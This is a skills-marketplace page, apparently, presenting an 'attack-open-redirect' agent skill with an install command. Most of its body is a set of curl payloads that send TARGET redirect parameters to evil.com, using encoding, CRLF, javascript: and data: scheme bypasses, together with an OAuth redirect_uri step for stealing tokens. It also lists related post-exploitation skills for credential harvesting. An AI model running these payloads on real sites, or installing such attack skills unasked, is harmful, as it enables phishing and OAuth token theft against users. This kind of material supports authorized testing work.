用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
直接命令不会经过审查 Prompt;运行前请先检查来源。
npx skills add https://github.com/CyberStrikeus/CyberStrike --skill attack-open-redirect命令会保持在同一行。复制前请横向滚动并检查完整内容。
想先保存到本地?可下载 SkillsMP 当前能够提供的文件。
正在显示 SKILL.md
| name | attack-open-redirect |
| description | Open redirect exploitation — URL parameter manipulation, OAuth token theft, phishing chains |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["open-redirect","web","phishing","oauth","attack"] |
| tech_stack | ["web"] |
| cwe_ids | ["CWE-601"] |
| chains_with | ["attack-cors","attack-jwt"] |
| prerequisites | [] |
| severity_boost | {"attack-jwt":"Open redirect + OAuth = JWT/token theft"} |
Exploit URL redirect parameters to redirect users to attacker-controlled domains, steal OAuth tokens, or bypass security controls.
Common parameter names:
url, redirect, redirect_url, redirect_uri, return, return_url, returnTo,
next, goto, target, dest, destination, rurl, redir, forward, continue,
callback, path, out, view, login_url, image_url, go, link, ref
# Direct redirect
curl -s -D- "https://TARGET/redirect?url=https://evil.com"
# Protocol-relative
curl -s -D- "https://TARGET/redirect?url=//evil.com"
# Encoded
curl -s -D- "https://TARGET/redirect?url=https%3A%2F%2Fevil.com"
# Backslash bypass
curl -s -D- "https://TARGET/redirect?url=https://evil.com\@TARGET"
# At-sign bypass
curl -s -D- "https://TARGET/redirect?url=https://TARGET@evil.com"
# Subdomain matching
curl -s -D- "https://TARGET/redirect?url=https://TARGET.evil.com"
# URL encoding tricks
curl -s -D- "https://TARGET/redirect?url=https://evil.com%23.TARGET"
# Double encoding
curl -s -D- "https://TARGET/redirect?url=https://%65%76%69%6c.com"
# Null byte
curl -s -D- "https://TARGET/redirect?url=https://evil.com%00.TARGET"
# CRLF + Location header
curl -s -D- "https://TARGET/redirect?url=%0d%0aLocation:%20https://evil.com"
# JavaScript scheme
curl -s -D- "https://TARGET/redirect?url=javascript:alert(document.domain)"
# Data URI
curl -s -D- "https://TARGET/redirect?url=data:text/html,<script>alert(1)</script>"
# Test with OAuth tester
attack_script oauth_tester \
--client-id CLIENT_ID \
--redirect-uri \
--json-output
If redirect_uri accepts attacker domain, the OAuth code/token is sent to the attacker.
| Finding | Severity |
|---|---|
| Open redirect + OAuth token theft | Critical (P1) |
| Open redirect in login/auth flow | High (P2) |
| Generic open redirect | Medium (P3) |
| JavaScript scheme redirect (XSS) | High (P2) |
attack_script oauth_tester — OAuth redirect_uri bypass testingcurl — manual redirect testingmacOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools
Windows userland post-exploitation for credential harvesting, monitoring, AMSI/ETW bypass, and stealth operations
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
基于 SOC 职业分类